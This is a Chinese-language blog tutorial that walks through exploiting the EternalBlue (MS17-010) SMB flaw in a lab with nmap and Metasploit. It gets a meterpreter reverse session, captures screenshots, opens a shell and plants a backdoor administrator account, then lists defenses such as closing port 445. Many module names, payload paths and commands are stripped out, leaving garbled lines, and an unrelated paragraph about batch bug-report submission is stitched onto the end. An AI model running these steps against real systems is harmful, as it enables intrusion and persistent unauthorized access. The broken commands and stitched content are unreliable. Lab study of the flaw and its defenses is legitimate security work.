漏洞盒子/漏洞扫描-手把手教黑客详细教程

漏洞盒子/漏洞扫描-手把手教黑客详细教程

漏洞背景:

1.何为永恒之蓝?

永恒之蓝( Blue)爆发于2017年4月14日晚,是一种利用系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.什么是SMB协议?

SMB(全称是 Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用端口和端口。

3. SMB工作原理是什么?

准备工作:

虚拟机:

靶机(rhost): (IP:192.168.244.133)

攻击机(lhost):Kali (IP:192.168.244.136)

所需工具:nmap、(MSF) 【工具均在Kali系统内】

漏洞复现过程: 主机发现 关闭防火墙和杀软

靶机关闭防火墙杀软等一切防御信息 否则nmap扫描不到

防火墙关闭路径

控制面板->系统和安全-> 防火墙

image.png

查看攻击机与靶机IP信息

查看攻击机与靶机的IP信息

攻击机:终端模拟器->

靶机:win->cmd->

image.png

image.png

进行Ping通测试

进行ping通测试

Kali使用CTRL+C快捷键进行终止命令进行

image.png

image.png

和上面两张图片一样结果的都表示Ping通成功

扫描存活主机以及开放端口

使用nmap扫描工具对目标机网段进行存活主机扫描以及靶机的445端口是否开放

image.png

image.png

可以看出目标机存活并且445端口为开放状态

入侵过程 开启数据库服务

以下命令均在Kali攻击机root终端进行!

开启

start

查看是否开启

image.png

此状态表示开启成功

初始化 数据库

初始化

msfdb init

image.png

此状态表示初始化成功

启动MSF框架

Kali root终端输入

image.png

此状态表示进入MSF框架成功

利用探测漏洞模块

#查看是否进入MSF攻击服务

#查找探测模块

use //smb/#利用探测模块

show #查看配置参数

set rhost 192.168.244.133/32#设置探测主机段

set 20#设置探测线程

run/#执行探测

image.png

image.png

探测出likely表示可能存在漏洞!

利用永恒之蓝模块

use //smb/#利用永恒之蓝漏洞

set rhost 192.168.244.133#设置攻击目标IP

set /x64//#设置攻击载荷(木马信息)

set lhost 192.168.244.136#设置监听主机IP

set lpost 445#设置监听端口

run/#执行攻击

image.png

运行成功后会出现meterpreter>
Meterpreter俗称"黑客瑞士军刀"

想要深入了解可以看以下内容

是框架中的一个扩展模块,作为溢出成功后的攻击载荷使用。它可以在触发漏洞后返回一个由攻击者控制的通道,以便远程执行命令。

的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。

还可以简化任务创建多个会话,利用这些会话进行渗透。在 中,是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中的通信是通过套接字实现的。

作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。此外,还支持Ruby脚本形式的扩展。

远程查看靶机信息和捕捉屏幕

#查看靶机系统信息

#查看靶机用户身份

#对靶机当前屏幕进行截图

image.png

需要注意的是最后一部屏幕截图保存到了根目录下
根目录下受权限保护可能查看不了图片
解决方法有两种改权限或者复制到桌面上 在这里讲的是第二种方法

cp .jpeg '/home/kali/桌面/flag1.png'

image.png

image.png

image.png

进入靶机控制台

shell #进入靶机cmd终端

image.png

成功进入靶机C:\Windows\system32路径下

对靶机进行后门植入

#创建新管理员用户

net user 123 /add

#将用户加入到本地管理员组当中

net /add

#查看本地管理员组当中的用户成员

net

#查看此路径下的所有文件和目录

dir

image.png

与图片中信息相同就代表后门植入成功
exit可以退回meterpreter路径下

查看靶机当前用户

image.png

创建文件夹

mkdir

image.png

exit可以退出MSF框架

如何防御 开启防火墙

防火墙开启路径

控制面板->系统和安全-> 防火墙

image.png

image.png

image.png

禁用靶机139和445端口

查看靶机445端口是否开启

-ant

image.png

可以看到445端口是开启状态

禁用靶机445端口路径

控制面板->系统和安全-> 防火墙

image.png

image.png

image.png

image.png

image.png

image.png

image.png

image.png

禁用服务

win+r 运行

输入.msc

image.png

关闭不必要的服务

关闭服务路径

控制面板->系统和安全-> 防火墙

image.png

image.png

根据需要可以选择关闭与否

注册表关闭445端口

win+r 运行

输入进入注册表

找到此注册表路径

根据自己系统位数进行修改64位就选择QWORD

\\\\NetBT\

image.png

重命名为

image.png

右键->修改->数值数据的值为0(0代表关闭,1代表打开),点击确定,完成设置 。

image.png

重启之后查看445端口是否关闭!

漏洞盒子_漏洞扫描_ms17-010漏洞

可以看到445端口已经不见了!

安装杀毒软件

360安全卫士与火绒安全软件成功阻止了永恒之蓝!

大家想要了解的,可以参考下!

360安全卫士和火绒安全软件都是知名的电脑安全软件,具有多种防护功能。

360安全卫士是一款全面而高效的电脑安全防护软件,它拥有强大的查杀能力,可以检测和清除电脑中的病毒、木马、恶意程序等安全隐患。同时,它还提供了多种实用的功能,如实时监控、木马查杀、漏洞修复等,可以帮助用户保护电脑安全,提高使用体验。

火绒安全软件则是一款以防护为主打功能的电脑安全软件,它拥有自主知识产权的新一代反病毒引擎,能够检测和分析恶意程序,提供全面的防护功能。此外,火绒安全软件还拥有钩子扫描功能,可以快速扫描指定进程,发现潜在的安全风险。

最后总结

2017年永恒之蓝漏洞,编号为ms17漏洞。

现在只有一些低版本的电脑没有打的补丁, 以上版本几乎都没有这个漏洞了。

虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。

让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!

~

网络安全学习,我们一起交流

~

  • 10
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞盒子是一个著名的漏洞报告平台,它允许安全研究人员将发现的漏洞提交给相关厂商进行修复。在漏洞报告的过程中,批量提交src(源代码)是一种比较高效的方式。 首先,批量提交src意味着研究人员可以一次性将多个漏洞报告一并提交给漏洞盒子团队。这样做的好处是可以节约时间和精力,避免逐个提交的繁琐过程。同时,批量提交还可以让漏洞盒子团队更快速地对不同漏洞进行分类和处理。 其次,批量提交src也有利于漏洞盒子团队的工作效率。漏洞盒子团队通常拥有庞大的研究人员社区,会对提交的src进行审核和验证,确定漏洞的真实性和危害等级。通过批量提交,漏洞盒子团队可以更好地整理和管理来自不同研究人员的报告,提高工作效率并及时提醒厂商修复漏洞。 不过,批量提交src也需要注意一些问题。首先,提交的源代码应该是真实的、有效的漏洞报告,避免误报或恶意提交。其次,对于不同漏洞,应该在提交时提供清晰的描述,包括漏洞的类型、危害程度和可复现的步骤等,以便漏洞盒子团队能够正确理解和处理。 总之,漏洞盒子批量提交src是一种高效的漏洞报告方式,既能节约时间和精力,也能提高漏洞盒子团队的工作效率。然而,在提交时需要确保报告的真实性和完整性,以帮助漏洞盒子团队更好地分类和处理漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值